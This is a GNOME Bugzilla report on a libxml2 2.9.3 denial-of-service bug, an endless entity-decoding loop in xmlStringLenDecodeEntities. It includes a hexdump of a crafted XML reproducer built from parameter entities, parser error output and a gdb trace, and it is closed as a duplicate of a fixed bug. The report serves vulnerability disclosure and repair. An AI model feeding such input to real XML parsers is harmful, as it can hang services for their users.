GNOME Bugzilla – Bug 759675
Infinite loop in xmlStringDecodeEntities
Last modified: 2017-02-08 19:21:54 UTC
Created attachment 317674 [details] normalized testcase (not minimal) Hi, The following infinite recursion (Denial of Service) appears to exist in xmlStringDecodeEntities at parser.c:2864, on Libxml2 stable release 2.9.3: c02_id0062.min:3: parser error : xmlParseStringPEReference: no name w00000~00% %nitf;l-0sae"0C-i00000000000000000000000000000000000000000000000000 ^ c02_id0062.min:3: parser error : xmlParseStringPEReference: no name w00000~00% %nitf;l-0sae"0C-i00000000000000000000000000000000000000000000000000 ^ c02_id0062.min:3: parser error : xmlParseStringPEReference: no name w00000~00% %nitf;l-0sae"0C-i00000000000000000000000000000000000000000000000000 ^ c02_id0062.min:3: parser error : xmlParseStringPEReference: no name w00000~00% %nitf;l-0sae"0C-i00000000000000000000000000000000000000000000000000 ^ c02_id0062.min:3: parser error : Detected an entity reference loop w00000~00% %nitf;l-0sae"0C-i00000000000000000000000000000000000000000000000000 ^ c02_id0062.min:3: parser error : xmlParseStringPEReference: no name w00000~00% %nitf;l-0sae"0C-i00000000000000000000000000000000000000000000000000 ^ c02_id0062.min:3: parser error : Detected an entity reference loop w00000~00% %nitf;l-0sae"0C-i00000000000000000000000000000000000000000000000000 ^ c02_id0062.min:3: parser error : xmlParseStringPEReference: no name w00000~00% %nitf;l-0sae"0C-i00000000000000000000000000000000000000000000000000 ^ c02_id0062.min:3: parser error : xmlParseStringPEReference: no name w00000~00% %nitf;l-0sae"0C-i00000000000000000000000000000000000000000000000000 ^ c02_id0062.min:3: parser error : xmlParseStringPEReference: no name w00000~00% %nitf;l-0sae"0C-i00000000000000000000000000000000000000000000000000 ^ c02_id0062.min:3: parser error : Detected an entity reference loop w00000~00% %nitf;l-0sae"0C-i00000000000000000000000000000000000000000000000000 Reproducer as attached. An interrupted stack trace:
+ Trace 235828
Correction: issue seems to be in xmlStringLenDecodeEntities rather than xmlStringDecodeEntities in the report title: Line 2859: if (ent != NULL) { if (ent->content == NULL) { xmlLoadEntityContent(ctxt, ent); } ctxt->depth++; rep = xmlStringDecodeEntities(ctxt, ent->content, what, 0, 0, 0); ctxt->depth--; ent->content gets reset to the original xml content.
A near minimal reproducer: $ xxd -g 1 c02_id0062.min2 0000000: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 <?xml version="1 0000010: 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 49 53 .0" encoding="IS 0000020: 4f 38 38 35 39 31 22 3f 3e 3c 21 44 4f 43 54 59 O88591"?><!DOCTY 0000030: 50 45 65 20 50 55 42 4c 49 43 20 22 31 22 20 22 PEe PUBLIC "1" " 0000040: 64 64 4e 73 22 5b 3c 21 45 4e 54 49 54 59 20 25 ddNs"[<!ENTITY % 0000050: 20 6e 69 74 66 20 53 59 53 54 45 4d 20 22 22 3e nitf SYSTEM ""> 0000060: 3c 21 45 4e 54 49 54 59 20 66 30 4d 20 22 30 22 <!ENTITY f0M "0" 0000070: 3e 0a 3c 21 45 4e 54 49 54 59 20 4d 20 22 25 6e >.<!ENTITY M "%n 0000080: 69 74 66 3b 30 0a 77 30 30 30 30 30 7e 30 30 25 itf;0.w00000~00% 0000090: 20 25 6e 69 74 66 3b 8e 6c 2d 30 73 61 65 22 30 %nitf;.l-0sae"0 00000a0: 43 2d 69 30 30 30 30 30 30 30 C-i0000000 $ echo $GXML ~/libxml2_gdb/bin/xmllint $ gdb -q $GXML Reading symbols from ~/libxml2_gdb/bin/xmllint...done. (gdb) b xmlStringLenDecodeEntities Breakpoint 1 at 0x806186c: file parser.c, line 2743. (gdb) command Type commands for breakpoint(s) 1, one per line. End with a line saying just "end". >silent >print "xmlStringLenDecodeEntities" >x $esp >cont >end (gdb) r c02_id0062.min2 > /dev/null 2>&1 Starting program: ~/libxml2_gdb/bin/xmllint c02_id0062.min2 > /dev/null 2>&1 $1 = "xmlStringLenDecodeEntities" 0xbfffd740: 0x081c1180 $2 = "xmlStringLenDecodeEntities" 0xbfffd740: 0x00000000 $3 = "xmlStringLenDecodeEntities" 0xbfffd650: 0x00000000 $4 = "xmlStringLenDecodeEntities" 0xbfffd520: 0x081d4098 $5 = "xmlStringLenDecodeEntities" 0xbfffd560: 0x00000000 $6 = "xmlStringLenDecodeEntities" 0xbfffd470: 0x00000000 $7 = "xmlStringLenDecodeEntities" 0xbfffd380: 0x00000000 .... $11066 = "xmlStringLenDecodeEntities" 0xbfffb850: 0x00000000 $11067 = "xmlStringLenDecodeEntities" 0xbfffb760: 0x00000000 .... $117249 = "xmlStringLenDecodeEntities" 0xbfffb1c0: 0x00000000 $117250 = "xmlStringLenDecodeEntities" 0xbfffb0d0: 0x00000000 $117251 = "xmlStringLenDecodeEntities" 0xbfffb0d0: 0x081c0258 $117252 = "xmlStringLenDecodeEntities" 0xbfffb2b0: 0x00000000 $117253 = "xmlStringLenDecodeEntities" 0xbfffb1c0: 0x00000000 .... Not strictly a recursion stack overflow issue as $esp starts rewinding after a while ..
how to reproduce?
You may use the reproducer in the hexdump, just the ascii part of c02_id0062.min2$ $xxd -g 1 c02_id0062.min2 0000000: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 <?xml version="1 0000010: 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 49 53 .0" encoding="IS 0000020: 4f 38 38 35 39 31 22 3f 3e 3c 21 44 4f 43 54 59 O88591"?><!DOCTY 0000030: 50 45 65 20 50 55 42 4c 49 43 20 22 31 22 20 22 PEe PUBLIC "1" " 0000040: 64 64 4e 73 22 5b 3c 21 45 4e 54 49 54 59 20 25 ddNs"[<!ENTITY % 0000050: 20 6e 69 74 66 20 53 59 53 54 45 4d 20 22 22 3e nitf SYSTEM ""> 0000060: 3c 21 45 4e 54 49 54 59 20 66 30 4d 20 22 30 22 <!ENTITY f0M "0" 0000070: 3e 0a 3c 21 45 4e 54 49 54 59 20 4d 20 22 25 6e >.<!ENTITY M "%n 0000080: 69 74 66 3b 30 0a 77 30 30 30 30 30 7e 30 30 25 itf;0.w00000~00% 0000090: 20 25 6e 69 74 66 3b 8e 6c 2d 30 73 61 65 22 30 %nitf;.l-0sae"0 00000a0: 43 2d 69 30 30 30 30 30 30 30 C-i0000000
Bisecting libxml2, this was fixed by: Bug 761430: xmlReadMemory causes file and network access <https://bugzilla.gnome.org/show_bug.cgi?id=761430> <https://git.gnome.org/browse/libxml2/commit/?id=b1d34de46a11323fccffa9fadeb33be670d602f5> Duping to that bug. *** This bug has been marked as a duplicate of bug 761430 ***